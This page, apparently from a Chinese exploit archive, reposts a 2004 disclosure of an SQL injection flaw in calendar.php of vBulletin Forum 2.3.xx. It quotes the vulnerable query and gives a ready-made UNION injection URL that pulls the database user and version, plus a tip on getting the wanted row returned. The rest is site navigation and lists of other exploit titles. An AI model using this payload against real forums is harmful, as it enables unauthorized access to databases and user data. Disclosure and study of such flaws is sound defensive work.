首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vBulletin Forum 2.3.xx SQL Injection
来源:www.safechina.net 作者:mslug 发布时间:2004-01-06  

vBulletin Forum 2.3.xx SQL Injection


Website: www.safechina.net
Discovered by: mslug (a1476854_at_hotmail.com)

There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS03-043 - Messenger exploit b
·Microsoft ASN.1 Library Buffer
·phpbb_sql.pl
·Serv-U \site chmod xxx \Exploi
·phpBB v2.06 search_id sql inje
·Serv-U MDTM Exploits
·EPIC4 remote client-side stack
·PSOProxy v0.91 Remote buffer O
·85NIPrint.c 远程攻击程序
·ServU MDTM exploit
·XP图象式样让权限提升的漏洞
·WFTPD Server buffer overflow R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved